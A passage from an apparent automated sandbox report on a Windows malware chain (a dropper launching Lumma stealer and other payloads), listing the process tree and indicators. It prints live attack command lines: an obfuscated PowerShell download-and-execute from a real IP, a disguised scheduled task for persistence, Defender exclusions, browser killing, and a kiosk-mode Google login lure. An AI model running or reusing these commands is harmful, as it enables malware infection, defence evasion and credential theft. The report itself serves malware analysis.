SeCreatePagefilePrivilege 5620 powershell.exe Token: SeBackupPrivilege 5620 powershell.exe Token: SeRestorePrivilege 5620 powershell.exe Token: SeShutdownPrivilege 5620 powershell.exe Token: SeDebugPrivilege 5620 powershell.exe Token: SeSystemEnvironmentPrivilege 5620 powershell.exe Token: SeRemoteShutdownPrivilege 5620 powershell.exe Token: SeUndockPrivilege 5620 powershell.exe Token: SeManageVolumePrivilege 5620 powershell.exe Token: 33 5620 powershell.exe Token: 34 5620 powershell.exe Token: 35 5620 powershell.exe Token: 36 5620 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 3780 taskkill.exe Token: SeDebugPrivilege 5380 powershell.exe Token: SeIncreaseQuotaPrivilege 5380 powershell.exe Token: SeSecurityPrivilege 5380 powershell.exe Token: SeTakeOwnershipPrivilege 5380 powershell.exe Token: SeLoadDriverPrivilege 5380 powershell.exe Token: SeSystemProfilePrivilege 5380 powershell.exe Token: SeSystemtimePrivilege 5380 powershell.exe Token: SeProfSingleProcessPrivilege 5380 powershell.exe Token: SeIncBasePriorityPrivilege 5380 powershell.exe Token: SeCreatePagefilePrivilege 5380 powershell.exe Token: SeBackupPrivilege 5380 powershell.exe Token: SeRestorePrivilege 5380 powershell.exe Token: SeShutdownPrivilege 5380 powershell.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 3164 FunnyJellyfish.tmp 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 2784 27329d39c4.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe 3192 chrome.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 2784 27329d39c4.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 5156 firefox.exe 2784 27329d39c4.exe 2784 27329d39c4.exe 2784 27329d39c4.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6132 document.exe 5156 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3656 wrote to memory of 956 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 85 PID 3656 wrote to memory of 956 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 85 PID 3656 wrote to memory of 956 3656 de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe 85 PID 956 wrote to memory of 3980 956 skotes.exe 95 PID 956 wrote to memory of 3980 956 skotes.exe 95 PID 956 wrote to memory of 3980 956 skotes.exe 95 PID 3980 wrote to memory of 4624 3980 Lumma111.exe 96 PID 3980 wrote to memory of 4624 3980 Lumma111.exe 96 PID 4624 wrote to memory of 4052 4624 cmd.exe 98 PID 4624 wrote to memory of 4052 4624 cmd.exe 98 PID 4624 wrote to memory of 2460 4624 cmd.exe 99 PID 4624 wrote to memory of 2460 4624 cmd.exe 99 PID 4624 wrote to memory of 3904 4624 cmd.exe 100 PID 4624 wrote to memory of 3904 4624 cmd.exe 100 PID 4624 wrote to memory of 1592 4624 cmd.exe 103 PID 4624 wrote to memory of 1592 4624 cmd.exe 103 PID 4624 wrote to memory of 1312 4624 cmd.exe 105 PID 4624 wrote to memory of 1312 4624 cmd.exe 105 PID 956 wrote to memory of 4328 956 skotes.exe 106 PID 956 wrote to memory of 4328 956 skotes.exe 106 PID 956 wrote to memory of 4328 956 skotes.exe 106 PID 4624 wrote to memory of 208 4624 cmd.exe 107 PID 4624 wrote to memory of 208 4624 cmd.exe 107 PID 4624 wrote to memory of 1096 4624 cmd.exe 108 PID 4624 wrote to memory of 1096 4624 cmd.exe 108 PID 4624 wrote to memory of 2700 4624 cmd.exe 109 PID 4624 wrote to memory of 2700 4624 cmd.exe 109 PID 4624 wrote to memory of 2700 4624 cmd.exe 109 PID 956 wrote to memory of 4092 956 skotes.exe 111 PID 956 wrote to memory of 4092 956 skotes.exe 111 PID 4092 wrote to memory of 2976 4092 file.exe 112 PID 4092 wrote to memory of 2976 4092 file.exe 112 PID 2976 wrote to memory of 540 2976 wscript.exe 113 PID 2976 wrote to memory of 540 2976 wscript.exe 113 PID 2976 wrote to memory of 4812 2976 wscript.exe 114 PID 2976 wrote to memory of 4812 2976 wscript.exe 114 PID 540 wrote to memory of 2244 540 powershell.exe 117 PID 540 wrote to memory of 2244 540 powershell.exe 117 PID 4812 wrote to memory of 1456 4812 powershell.exe 118 PID 4812 wrote to memory of 1456 4812 powershell.exe 118 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 4812 wrote to memory of 3408 4812 powershell.exe 119 PID 956 wrote to memory of 848 956 skotes.exe 120 PID 956 wrote to memory of 848 956 skotes.exe 120 PID 956 wrote to memory of 848 956 skotes.exe 120 PID 848 wrote to memory of 2836 848 FunnyJellyfish.exe 121 PID 848 wrote to memory of 2836 848 FunnyJellyfish.exe 121 PID 848 wrote to memory of 2836 848 FunnyJellyfish.exe 121 PID 2836 wrote to memory of 5868 2836 FunnyJellyfish.tmp 122 PID 2836 wrote to memory of 5868 2836 FunnyJellyfish.tmp 122 PID 2836 wrote to memory of 5868 2836 FunnyJellyfish.tmp 122 PID 956 wrote to memory of 6132 956 skotes.exe 124 PID 956 wrote to memory of 6132 956 skotes.exe 124 PID 5868 wrote to memory of 3756 5868 cmd.exe 125 PID 5868 wrote to memory of 3756 5868 cmd.exe 125 PID 5868 wrote to memory of 3756 5868 cmd.exe 125 PID 956 wrote to memory of 7164 956 skotes.exe 126 PID 956 wrote to memory of 7164 956 skotes.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1096 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe"C:\Users\Admin\AppData\Local\Temp\de6b319d9a954c0d1d2889e288c0753b8920abd685bab8143f085443f981b7ca.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Users\Admin\AppData\Local\Temp\1007744001\Lumma111.exe"C:\Users\Admin\AppData\Local\Temp\1007744001\Lumma111.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\mode.commode 65,105⤵PID:4052
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p1299923009167529232566422481 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"5⤵
- Views/modifies file attributes
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:2244
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns6⤵
- Gathers network information
PID:1456
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"6⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3408
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Users\Admin\AppData\Local\Temp\is-BL5JC.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-BL5JC.tmp\FunnyJellyfish.tmp" /SL5="$A02B6,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5868 -
C:\Windows\SysWOW64\timeout.exetimeout /T 36⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe"C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5928 -
C:\Users\Admin\AppData\Local\Temp\is-1K7HM.tmp\FunnyJellyfish.tmp"C:\Users\Admin\AppData\Local\Temp\is-1K7HM.tmp\FunnyJellyfish.tmp" /SL5="$9027C,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3164 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Windows\system32\regsvr32.exe/s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"9⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{1D0DD40E-A59E-46DB-C7C8-00486DDCF0D6}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008108001\8e499cd4e2.exe"C:\Users\Admin\AppData\Local\Temp\1008108001\8e499cd4e2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\1008109001\adc4548f71.exe"C:\Users\Admin\AppData\Local\Temp\1008109001\adc4548f71.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6060
-
-
C:\Users\Admin\AppData\Local\Temp\1008110001\27329d39c4.exe"C:\Users\Admin\AppData\Local\Temp\1008110001\27329d39c4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2784 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:5524
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5156 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a0f3914-6ee0-44c7-988f-19bc8424dfaf} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" gpu6⤵PID:7000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8203a04-0569-4c8e-b75b-41866668be44} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" socket6⤵PID:5136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3076 -childID 1 -isForBrowser -prefsHandle 3152 -prefMapHandle 2760 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb62b6f5-79d7-4a19-9e55-7190b6afb9fb} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" tab6⤵PID:2088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3724 -childID 2 -isForBrowser -prefsHandle 3748 -prefMapHandle 3744 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e63f1597-b212-472e-b73e-4d098f6bd206} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" tab6⤵PID:6076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4800 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4792 -prefMapHandle 4788 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eef523b-4e8b-42fe-8af7-54f890cef95c} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" utility6⤵
- Checks processor information in registry
PID:6140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5336 -prefMapHandle 5364 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb8dd3fe-41ac-4b19-a2c7-ad15588202b8} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" tab6⤵PID:6272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3932 -childID 4 -isForBrowser -prefsHandle 5488 -prefMapHandle 5504 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51a739a2-c32e-46a4-8ad7-312abe13e3b1} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" tab6⤵PID:6652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 5 -isForBrowser -prefsHandle 5824 -prefMapHandle 5828 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a37cff3-542d-4c13-ba68-b0c518f4ca83} 5156 "\\.\pipe\gecko-crash-server-pipe.5156" tab6⤵PID:5364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1008111001\c908739900.exe"C:\Users\Admin\AppData\Local\Temp\1008111001\c908739900.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6312
-
-
C:\Users\Admin\AppData\Local\Temp\1008112001\6b6d057204.exe"C:\Users\Admin\AppData\Local\Temp\1008112001\6b6d057204.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1944 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbfb98cc40,0x7ffbfb98cc4c,0x7ffbfb98cc585⤵PID:5140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,2427019424258856408,5191399411740478578,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:25⤵PID:2892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,2427019424258856408,5191399411740478578,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:35⤵PID:6476
-
-
